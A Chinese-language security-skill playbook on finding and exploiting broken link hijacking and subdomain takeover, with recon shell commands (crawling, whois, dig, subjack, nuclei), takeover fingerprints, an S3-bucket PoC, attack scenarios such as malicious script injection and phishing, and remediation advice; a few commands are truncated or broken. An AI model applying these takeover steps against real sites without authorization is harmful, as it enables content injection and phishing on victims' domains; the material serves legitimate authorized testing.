| name | exploiting-broken-link-hijacking |
| description | 通过识别对过期域名、已停用云资源和失效外部服务的引用,发现并利用断链劫持(Broken Link Hijacking)漏洞,攻击者可申领这些资源。 |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["broken-link-hijacking","blh","subdomain-takeover","dead-link","expired-domain","supply-chain","external-resource"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
利用断链劫持漏洞(Exploiting Broken Link Hijacking)
适用场景
- 审计 Web 应用程序中对过期或未申领外部资源的引用时
- 对第三方脚本和资源依赖项进行供应链安全评估期间
- 通过悬空 CNAME 记录测试子域名接管机会时
- 在漏洞奖励(bug bounty hunting)计划中寻找断链劫持漏洞时
- 评估生产应用程序中外部资源依赖的安全性时
前置条件
- 用于发现所有外部链接的 Web 爬虫(Burp Suite Spider、Scrapy)
- 用于检查 CNAME 记录和域名可用性的 DNS 查询工具
- 用于申领过期域名的域名注册商访问权限(作为概念验证)
- 了解 CDN 和云服务供应(S3、Azure Blob、GitHub Pages)
- blc(broken-link-checker)或类似工具用于自动链接验证
- 了解容易受到子域名接管攻击的服务(can-i-take-over-xyz)
工作流程
步骤 1:爬取并提取所有外部引用
npx broken-link-checker http://target.com --recursive --ordered \
--exclude-internal --filter-level 3 -o broken_links.txt
curl -s http://target.com | grep -oP 'https?://[^"'"'"'\s>]+' | sort -u > all_links.txt
curl -s http://target.com | grep -oP 'src="[^"]*"' | grep -v target.com > external_scripts.txt
curl -s http://target.com | grep -oP 'href="[^"]*\.css"' | grep -v target.com > external_css.txt
curl -s "https://web.archive.org/web/timemap/link/http://target.com" | \
grep -oP 'https?://[^>]+' | sort -u > historical_links.txt
步骤 2:识别失效或可申领的资源
for domain in $(cat external_domains.txt); do
whois $domain 2>/dev/null | grep -qi "no match\|not found\|available" && \
echo "[可申领] $domain"
done
while read url; do
status=$(curl -o /dev/null -s -w "%{http_code}" "$url" --max-time 5)
if [ "$status" = "000" ] || [ "$status" = "404" ]; then
echo "[失效] $url (状态: $status)"
fi
done < all_links.txt
for sub in $(cat subdomains.txt); do
cname=$(dig +short CNAME $sub)
if [ -n "$cname" ]; then
resolved=$(dig +short $cname)
if [ -z "$resolved" ]; then
echo "[悬空] $sub -> $cname (未解析)"
fi
fi
aws s3 s3://target-assets 2>&1 | grep -q &&
步骤 3:检查特定服务的接管可能性
curl -s https://subdomain.target.com | grep -q "There isn't a GitHub Pages site here"
curl -s http://subdomain.target.com | grep -q "NoSuchBucket"
curl -s http://subdomain.target.com | grep -q "The specified container does not exist"
curl -s http://subdomain.target.com | grep -q "No such app"
curl -s http://subdomain.target.com | grep -q "Sorry, this shop is currently unavailable"
subjack -w subdomains.txt -c fingerprints.json -t 100 -o takeover_candidates.txt
subfinder -d target.com -silent | nuclei -t http/takeovers/ -o takeovers.txt
步骤 4:验证外部脚本劫持
curl -s http://target.com | grep -oP 'src="https?://([^/"]+)' | \
cut -d'/' -f3 | sort -u | while read domain; do
whois "$domain" 2>/dev/null | grep -qi "no match\|available" && \
echo "[可劫持脚本] $domain 被 target.com 加载"
done
curl -s http://target.com | grep -oP 'unpkg\.com/[^@/]+' | sort -u
curl -s http://target.com | grep -oP 'cdn\.jsdelivr\.net/npm/[^@/]+' | sort -u
步骤 5:利用断链(仅授权测试)
aws s3 mb s3://target-expired-bucket --region us-east-1
echo "<html><body><h1>断链劫持 PoC - [您的名字]</h1></body></html>" > index.html
步骤 6:评估影响并报告
核心概念
| 概念 | 定义 |
|---|
| 断链劫持(Broken Link Hijacking) | 申领目标网站引用的外部资源的控制权 |
| 悬空 CNAME(Dangling CNAME) | 指向未申领或已停用服务的 DNS CNAME 记录 |
| 子域名接管(Subdomain Takeover) | 通过供应 CNAME 指向的服务来申领子域名 |
| 外部脚本劫持(External Script Hijacking) | 注册目标加载的 JavaScript 所在的过期域名 |
| 供应链攻击(Supply Chain Attack) | 通过入侵外部依赖项来注入恶意内容 |
| 失效链接(Dead Link) | 返回 404 或 DNS 解析失败的 URL 引用 |
| 资源指纹识别(Resource Fingerprinting) | 通过错误消息和响应头识别特定云服务 |
工具与系统
| 工具 | 用途 |
|---|
| broken-link-checker | 通过 Web 爬取自动发现断链 |
| subjack | 子域名接管检测工具 |
| nuclei | 基于模板的接管检测扫描器 |
| can-i-take-over-xyz | 容易受到接管攻击的服务的社区数据库 |
| BadDNS | 用于检测域名/子域名接管的 DNS 审计工具 |
| Wayback Machine | 用于发现过去外部引用的历史 URL 分析 |
常见场景
- JavaScript 供应链 — 注册目标加载的 JavaScript 所在的过期域名;注入影响所有访客的恶意代码
- S3 存储桶接管 — 申领目标引用的已删除 AWS S3 存储桶;提供恶意内容或窃取上传的数据
- GitHub Pages 劫持 — 创建匹配悬空 CNAME 的 GitHub Pages 仓库,在目标子域名上提供钓鱼页面
- 社交媒体冒充 — 申领目标网站链接的未申领社交媒体账号进行品牌冒充
- CDN 包劫持 — 申领通过 CDN URL 引用的已废弃 npm 包以注入恶意 JavaScript
输出格式
## 断链劫持报告
- **目标**: http://target.com
- **外部链接总数**: 145
- **失效链接**: 12
- **可劫持资源**: 3
### 发现
| # | 资源 | 类型 | 状态 | 影响 |
|---|----------|------|--------|--------|
| 1 | analytics.expired-domain.com | JavaScript | 域名可注册 | 完整 XSS |
| 2 | assets.target.com -> S3 存储桶 | 静态资源 | 存储桶已删除 | 内容注入 |
| 3 | blog.target.com -> GitHub Pages | 子域名 | 无 GitHub 仓库 | 子域名接管 |
### 修复建议
- 删除对已停用外部资源的引用
- 删除未使用子域名的悬空 CNAME 记录
- 为外部脚本实施子资源完整性(SRI)
- 定期审计外部依赖项的可用性
- 使用 Content Security Policy 限制允许的脚本来源